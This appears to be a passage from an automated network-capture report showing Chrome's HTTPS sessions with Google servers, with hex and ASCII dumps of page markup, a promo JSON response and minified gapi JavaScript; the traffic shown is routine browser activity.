                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                            Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                            Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC605INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                            Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC852INData Raw: 33 34 64 0d 0a 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 20 67 62 5f 6f 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 68 65 61 64 65 72 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 51 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61
                                                                                                                                                                                                                                                                                            Data Ascii: 34d\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a gb_od\"\u003e\u003c\/div\u003e\u003c\/header\u003e\u003cdiv class\u003d\"gb_Qc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv cla
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 38 30 30 30 0d 0a 33 37 30 30 33 33 34 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 31 34 32 30 36 37 30 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74
                                                                                                                                                                                                                                                                                            Data Ascii: 80003700334,3700949,3701384,101420670,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunct
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69
                                                                                                                                                                                                                                                                                            Data Ascii: ;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65
                                                                                                                                                                                                                                                                                            Data Ascii: tion(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.docume
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC1390INData Raw: 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                            Data Ascii: u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            13192.168.2.549881142.250.184.2284435332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:55 GMT
                                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            14192.168.2.549907142.250.184.2064435332C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: apis.google.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                            Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                            Content-Length: 117446
                                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                            Server: sffe
                                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 08:45:49 GMT
                                                                                                                                                                                                                                                                                            Expires: Sat, 27 Dec 2025 08:45:49 GMT
                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                            Age: 371589
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                            Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                                                                            Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                                                                            Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                                                                            Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                            Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                                                                            Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
